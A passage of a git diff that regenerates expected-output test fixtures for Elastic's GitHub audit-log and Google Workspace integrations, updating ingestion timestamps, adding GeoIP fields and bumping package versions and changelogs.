"{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631999445252,\"action\":\"required_status_check.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5241,7 +5241,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041638719Z", + "ingested": "2021-12-14T14:44:07.248233941Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146504600,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5281,7 +5281,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041644590Z", + "ingested": "2021-12-14T14:44:07.248234325Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1630619331143,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5321,7 +5321,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041650291Z", + "ingested": "2021-12-14T14:44:07.248234712Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1630693170285,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5361,7 +5361,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041655290Z", + "ingested": "2021-12-14T14:44:07.248235099Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146504174,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5401,7 +5401,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041660330Z", + "ingested": "2021-12-14T14:44:07.248235486Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146507550,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5442,7 +5442,7 @@ }, "event": { "action": "protected_branch.create", - "ingested": "2021-10-12T20:36:26.041665099Z", + "ingested": "2021-12-14T14:44:07.248235933Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631999445214,\"action\":\"protected_branch.create\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -5485,7 +5485,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041676079Z", + "ingested": "2021-12-14T14:44:07.248236323Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631999520468,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5526,7 +5526,7 @@ }, "event": { "action": "team.add_repository", - "ingested": "2021-10-12T20:36:26.041694434Z", + "ingested": "2021-12-14T14:44:07.248236713Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/authors\"},\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146103741,\"action\":\"team.add_repository\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5570,7 +5570,7 @@ }, "event": { "action": "team.add_repository", - "ingested": "2021-10-12T20:36:26.041702739Z", + "ingested": "2021-12-14T14:44:07.248237103Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/contributors\"},\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146117823,\"action\":\"team.add_repository\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5613,7 +5613,7 @@ }, "event": { "action": "repo.create", - "ingested": "2021-10-12T20:36:26.041709171Z", + "ingested": "2021-12-14T14:44:07.248237495Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632145650082,\"action\":\"repo.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5653,7 +5653,7 @@ }, "event": { "action": "protected_branch.update_linear_history_requirement_enforcement_level", - "ingested": "2021-10-12T20:36:26.041714982Z", + "ingested": "2021-12-14T14:44:07.248237872Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632155655669,\"action\":\"protected_branch.update_linear_history_requirement_enforcement_level\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5693,7 +5693,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041720352Z", + "ingested": "2021-12-14T14:44:07.248238284Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632421196978,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5733,7 +5733,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041726434Z", + "ingested": "2021-12-14T14:44:07.248238683Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1630619330775,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5773,7 +5773,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041731313Z", + "ingested": "2021-12-14T14:44:07.248239084Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631573111131,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5813,7 +5813,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041736022Z", + "ingested": "2021-12-14T14:44:07.248239474Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631575577913,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5848,7 +5848,7 @@ }, "event": { "action": "repo.actions_enabled", - "ingested": "2021-10-12T20:36:26.041740841Z", + "ingested": "2021-12-14T14:44:07.248239860Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631897960413,\"action\":\"repo.actions_enabled\"}", "type": [ "access" @@ -5888,7 +5888,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041745900Z", + "ingested": "2021-12-14T14:44:07.248240248Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1630693191818,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5929,7 +5929,7 @@ }, "event": { "action": "protected_branch.create", - "ingested": "2021-10-12T20:36:26.041750669Z", + "ingested": "2021-12-14T14:44:07.248240634Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146170407,\"action\":\"protected_branch.create\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -5972,7 +5972,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041755598Z", + "ingested": "2021-12-14T14:44:07.248241013Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146506531,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6012,7 +6012,7 @@ }, "event": { "action": "required_status_check.create", - "ingested": "2021-10-12T20:36:26.041760578Z", + "ingested": "2021-12-14T14:44:07.248241397Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146549475,\"action\":\"required_status_check.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6052,7 +6052,7 @@ }, "event": { "action": "repo.rename", - "ingested": "2021-10-12T20:36:26.041765337Z", + "ingested": "2021-12-14T14:44:07.248241785Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1630625448041,\"action\":\"repo.rename\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6092,7 +6092,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041770436Z", + "ingested": "2021-12-14T14:44:07.248242170Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631310992353,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6132,7 +6132,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041775866Z", + "ingested": "2021-12-14T14:44:07.248242569Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631573290891,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6172,7 +6172,7 @@ }, "event": { "action": "protected_branch.update_admin_enforced", - "ingested": "2021-10-12T20:36:26.041781357Z", + "ingested": "2021-12-14T14:44:07.248242971Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632155655683,\"action\":\"protected_branch.update_admin_enforced\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6212,7 +6212,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041786537Z", + "ingested": "2021-12-14T14:44:07.248243354Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632421366852,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6252,7 +6252,7 @@ }, "event": { "action": "repo.access", - "ingested": "2021-10-12T20:36:26.041791937Z", + "ingested": "2021-12-14T14:44:07.248243746Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1630625423921,\"action\":\"repo.access\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6292,7 +6292,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041796956Z", + "ingested": "2021-12-14T14:44:07.248244139Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631314271117,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6332,7 +6332,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041802056Z", + "ingested": "2021-12-14T14:44:07.248244529Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631834442043,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6372,7 +6372,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041807145Z", + "ingested": "2021-12-14T14:44:07.248244932Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631834270875,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6412,7 +6412,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041812315Z", + "ingested": "2021-12-14T14:44:07.248245320Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632177923051,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6452,7 +6452,7 @@ }, "event": { "action": "protected_branch.update_linear_history_requirement_enforcement_level", - "ingested": "2021-10-12T20:36:26.041817575Z", + "ingested": "2021-12-14T14:44:07.248245704Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631999556056,\"action\":\"protected_branch.update_linear_history_requirement_enforcement_level\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6492,7 +6492,7 @@ }, "event": { "action": "protected_branch.update_required_status_checks_enforcement_level", - "ingested": "2021-10-12T20:36:26.041824257Z", + "ingested": "2021-12-14T14:44:07.248246143Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632155595828,\"action\":\"protected_branch.update_required_status_checks_enforcement_level\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6532,7 +6532,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041829257Z", + "ingested": "2021-12-14T14:44:07.248246522Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632181439344,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6572,7 +6572,7 @@ }, "event": { "action": "project.create", - "ingested": "2021-10-12T20:36:26.041834236Z", + "ingested": "2021-12-14T14:44:07.248246908Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631317044168,\"action\":\"project.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6611,7 +6611,7 @@ }, "event": { "action": "org.audit_log_export", - "ingested": "2021-10-12T20:36:26.041841059Z", + "ingested": "2021-12-14T14:44:07.248247314Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"created_at\":1631999791816,\"action\":\"org.audit_log_export\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6655,7 +6655,7 @@ }, "event": { "action": "team.add_member", - "ingested": "2021-10-12T20:36:26.041845968Z", + "ingested": "2021-12-14T14:44:07.248247694Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/admins\"},\"org\":\"Example-Org\",\"created_at\":1632173981540,\"action\":\"team.add_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -6704,7 +6704,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041851228Z", + "ingested": "2021-12-14T14:44:07.248248086Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632178684304,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6744,7 +6744,7 @@ }, "event": { "action": "protected_branch.update_linear_history_requirement_enforcement_level", - "ingested": "2021-10-12T20:36:26.041856287Z", + "ingested": "2021-12-14T14:44:07.248248480Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632155595845,\"action\":\"protected_branch.update_linear_history_requirement_enforcement_level\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6784,7 +6784,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041861267Z", + "ingested": "2021-12-14T14:44:07.248249097Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632155621270,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6824,7 +6824,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041866186Z", + "ingested": "2021-12-14T14:44:07.248249484Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632181178974,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6864,7 +6864,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041871145Z", + "ingested": "2021-12-14T14:44:07.248249943Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146504576,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6904,7 +6904,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041876145Z", + "ingested": "2021-12-14T14:44:07.248250333Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631310927600,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6942,7 +6942,7 @@ }, "event": { "action": "pull_request_review_comment.create", - "ingested": "2021-10-12T20:36:26.041881024Z", + "ingested": "2021-12-14T14:44:07.248250713Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1631573139911,\"action\":\"pull_request_review_comment.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6983,7 +6983,7 @@ }, "event": { "action": "repository_vulnerability_alerts.disable", - "ingested": "2021-10-12T20:36:26.041885733Z", + "ingested": "2021-12-14T14:44:07.248251108Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632145649767,\"action\":\"repository_vulnerability_alerts.disable\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -7027,7 +7027,7 @@ }, "event": { "action": "team.add_repository", - "ingested": "2021-10-12T20:36:26.041890762Z", + "ingested": "2021-12-14T14:44:07.248251494Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/admins\"},\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146087112,\"action\":\"team.add_repository\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7070,7 +7070,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041895561Z", + "ingested": "2021-12-14T14:44:07.248251884Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631896070699,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7110,7 +7110,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041900320Z", + "ingested": "2021-12-14T14:44:07.248252638Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631898264113,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7150,7 +7150,7 @@ }, "event": { "action": "team.create", - "ingested": "2021-10-12T20:36:26.041905129Z", + "ingested": "2021-12-14T14:44:07.248253073Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/contributors\"},\"org\":\"Example-Org\",\"created_at\":1631999351150,\"action\":\"team.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7194,7 +7194,7 @@ }, "event": { "action": "team.add_repository", - "ingested": "2021-10-12T20:36:26.041909888Z", + "ingested": "2021-12-14T14:44:07.248253453Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/admins\"},\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1630619298089,\"action\":\"team.add_repository\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7237,7 +7237,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041914697Z", + "ingested": "2021-12-14T14:44:07.248253840Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631314239837,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7277,7 +7277,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041919316Z", + "ingested": "2021-12-14T14:44:07.248254227Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631575217017,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7317,7 +7317,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041923944Z", + "ingested": "2021-12-14T14:44:07.248254624Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631999520452,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7357,7 +7357,7 @@ }, "event": { "action": "protected_branch.update_pull_request_reviews_enforcement_level", - "ingested": "2021-10-12T20:36:26.041928593Z", + "ingested": "2021-12-14T14:44:07.248255015Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632155655636,\"action\":\"protected_branch.update_pull_request_reviews_enforcement_level\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7397,7 +7397,7 @@ }, "event": { "action": "protected_branch.update_admin_enforced", - "ingested": "2021-10-12T20:36:26.041933112Z", + "ingested": "2021-12-14T14:44:07.248255409Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632155595860,\"action\":\"protected_branch.update_admin_enforced\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7437,7 +7437,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041937941Z", + "ingested": "2021-12-14T14:44:07.248255936Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146507567,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7477,7 +7477,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041942549Z", + "ingested": "2021-12-14T14:44:07.248256326Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146506554,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7517,7 +7517,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041947228Z", + "ingested": "2021-12-14T14:44:07.248256703Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632437191581,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7557,7 +7557,7 @@ }, "event": { "action": "protected_branch.policy_override", - "ingested": "2021-10-12T20:36:26.041952007Z", + "ingested": "2021-12-14T14:44:07.248257091Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146375501,\"action\":\"protected_branch.policy_override\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7597,7 +7597,7 @@ }, "event": { "action": "pull_request.ready_for_review", - "ingested": "2021-10-12T20:36:26.041956726Z", + "ingested": "2021-12-14T14:44:07.248257478Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632439409862,\"action\":\"pull_request.ready_for_review\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7636,7 +7636,7 @@ }, "event": { "action": "org.audit_log_git_event_export", - "ingested": "2021-10-12T20:36:26.041961365Z", + "ingested": "2021-12-14T14:44:07.248257860Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"created_at\":1632712526255,\"action\":\"org.audit_log_git_event_export\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" diff --git a/packages/github/manifest.yml b/packages/github/manifest.yml index 1e22b323c4e..d58d3fd3767 100644 --- a/packages/github/manifest.yml +++ b/packages/github/manifest.yml @@ -1,6 +1,6 @@ name: github title: GitHub -version: 0.2.0 +version: 0.2.1 release: experimental description: Collect events from GitHub with Elastic Agent. type: integration diff --git a/packages/google_workspace/changelog.yml b/packages/google_workspace/changelog.yml index 5e6d2d6ad32..194e93700ae 100644 --- a/packages/google_workspace/changelog.yml +++ b/packages/google_workspace/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.2.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log-expected.json index 13667692276..53d80981b6b 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log-expected.json @@ -34,6 +34,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -43,7 +55,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:24.232161700Z", + "ingested": "2021-12-14T14:44:14.844997847Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CHANGE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_APPLICATION_SETTING", @@ -99,6 +111,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -108,7 +132,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:24.232166900Z", + "ingested": "2021-12-14T14:44:14.845000165Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CREATE_APPLICATION_SETTING", @@ -164,6 +188,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -173,7 +209,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:24.232172300Z", + "ingested": "2021-12-14T14:44:14.845000607Z", "original": 